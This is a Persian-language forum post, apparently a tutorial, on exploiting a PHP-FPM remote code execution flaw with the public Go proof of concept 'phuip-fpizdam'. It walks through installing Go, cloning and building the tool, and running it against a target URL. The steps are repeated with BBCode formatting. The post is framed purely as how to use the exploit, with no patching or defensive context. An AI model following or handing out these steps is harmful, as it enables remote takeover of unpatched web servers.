آسیب پذیری مورد نظر در ماژول PHP-FPM وجود دارد و با ایجاد زنجیرهای آن با سایر موارد میتواند به مهاجمان اجازه دهد از راه دور کد دلخواه را روی سرورهای آسیب پذیر اجرا کنند.
در این پست به نحوه استفاده از اکسپلویت میپردازیم:
به منظور استفاده از این آسیب پذیری، یک POC با زبان golang ایجاد شده است که در لینک زیر قابل دسترس است :
به منظور راه اندازی ابتدا با یکی از دستورات زیر golang را در سیستم عامل خود نصب نمایید :
پس از دریافت پیغام نصب موفقیت آمیز با دستور git clone فایل های POC را دانلود نمایید :
سپس با دستور cd به فولدر مربوطه رفته و دستور go build را اجرا نمیایید:
حالا میتوانید با دستور phuip-fpizdam برنامه را اجرا نمایید:
در این پست به نحوه استفاده از اکسپلویت میپردازیم:
به منظور استفاده از این آسیب پذیری، یک POC با زبان golang ایجاد شده است که در لینک زیر قابل دسترس است :
کد:
[LEFT][SIZE=14px][B][URL]https://github.com/neex/phuip-fpizdam[/URL][/B][/SIZE][/LEFT] [SIZE=14px][/SIZE]
به منظور راه اندازی ابتدا با یکی از دستورات زیر golang را در سیستم عامل خود نصب نمایید :
کد:
[LEFT][SIZE=14px]apt-get install go yum install go[/SIZE] [/LEFT] [SIZE=14px][/SIZE]
پس از دریافت پیغام نصب موفقیت آمیز با دستور git clone فایل های POC را دانلود نمایید :
کد:
[LEFT][SIZE=14px]git clone [B][URL]https://github.com/neex/phuip-fpizdam.git[/URL][/B][/SIZE] [/LEFT] [SIZE=14px][/SIZE]
سپس با دستور cd به فولدر مربوطه رفته و دستور go build را اجرا نمیایید:
کد:
[LEFT][SIZE=14px]cd phuip-fpizdam[/SIZE] [SIZE=14px]go build[/SIZE] [/LEFT] [SIZE=14px][/SIZE]
حالا میتوانید با دستور phuip-fpizdam برنامه را اجرا نمایید:
کد:
[LEFT][SIZE=14px]phuip-fpizdam http://target.com/index.php [/SIZE][/LEFT] [SIZE=14px][/SIZE]